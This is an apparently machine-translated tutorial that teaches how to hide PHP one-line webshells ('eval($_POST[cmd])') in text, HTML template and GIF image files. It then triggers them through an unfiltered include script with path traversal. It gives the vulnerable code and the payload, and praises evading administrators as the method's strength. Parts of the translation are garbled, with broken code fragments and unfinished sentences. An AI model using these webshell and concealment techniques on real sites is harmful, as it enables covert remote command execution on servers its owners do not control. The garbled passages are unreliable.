The trick is to know that if you put a PHP statement into a picture, you can't do it anyway, because PHP only resolves files that have the file name extension PHP. So be able to make the PHP statement hidden in the picture executed. We have recourse to the call function in PHP: Include, require, and so on.
We still remember the previous days to hide the Trojan horse to the picture of the article it. That is, in the PHP file with include ("x.gif") such statements to invoke hidden in the picture of the Trojan. The statements in ASP are similar. Seemingly very covert but call pictures directly to people who know a little bit about PHP is not difficult to find suspicious. Because the URL in the get way difficult to pass parameters, which makes the performance of the Trojan can not be played.
include functions are used more frequently in PHP, so there are too many security issues, such as PHPWIND1.36 vulnerabilities because the variables behind include do not filter. This allows us to construct similar statements to insert into the PHP file. Then hide the trojan in the picture or HTML file, you can say that the concealment is even higher. Insert the following sentence in the Phpwind forum: "? @include includ/$PHPWIND _root; <mailto: @include ' includ/'. $PHPWIND _root;? > > The general admin is unable to see out.
has the include function to help us hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because TXT, HTML and picture files of these three types of files in the forum or article system is the most common, the following we will do the test in turn.
first set up a php file test.php file content is:
<?php
$test =$_get[' test '];
@include ' test/'. $test;
? >
TXT file is generally a description file, so we put a word Trojan into the directory of the description file OK. Casually create a TXT file t.txt. We put a word trojan <?eval ($_post[cmd]);? > paste into the T.txt file. Then visit http://localhost/test/test.php?test=. /t.txt
files for HTML are typically template files. In order for the Trojan inserted into the HTML file to be invoked and not displayed, we can add a text box with a hidden attribute in the HTML, such as: <input Type=hidden value= "<?eval ($_post[cmd));? > > and then use the method ditto. The results of the return of the execution can generally be viewed from the source file. Use to view this program directory function. View source file contents for <input type=hidden value= "C:\Uniserver2_7s\www\test" > I can get the directory for C:\Uniserver2_7s\www\test.
below we say the picture file, to say the most poisonous one trick is to hide the trojan in the picture. We can directly to a picture to edit, put <?eval ($_post[cmd]);? > Inserts the end of the picture.
are generally not affected by the test. Then the same way the client Trojan address is added to the
we look at the PHP environment variable Returns the result is the original picture.
There may be a gap between the results we imagined, in fact, the command has been run, only the return results are not visible, because this is a real GIF file, so it will not show the return results, in order to prove whether the implementation of the command we execute the upload file command. As expected, the file was successfully uploaded to the server. The advantage of this forgery is good concealment. The disadvantage also naturally needless to say is not echo. If you want to see the results returned, take out a notepad and forge a fake picture file.
here on the basic test finished, how to hide php backdoor to see your own choice. If there are any irregularities, please point out that the wording is hasty.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.